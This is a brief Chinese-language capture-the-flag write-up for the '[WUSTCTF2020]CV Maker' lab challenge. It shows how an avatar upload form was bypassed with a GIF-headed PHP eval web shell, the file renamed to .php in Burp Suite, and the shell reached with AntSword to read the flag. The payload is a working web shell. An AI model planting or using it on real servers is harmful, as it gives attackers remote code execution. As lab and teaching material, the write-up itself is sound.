[WUSTCTF2020]CV Maker
[WUSTCTF2020]CV Maker
打开环境
注册了账号登陆,发现有上传头像的地方,尝试上传文件
可以上传图片马
GIF89a
<script language='php'> @eval($_POST['shell']);</script>
BP里抓包改为php,得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php
使用蚁剑连接
根目录下发现flag文件,打开即可得到flag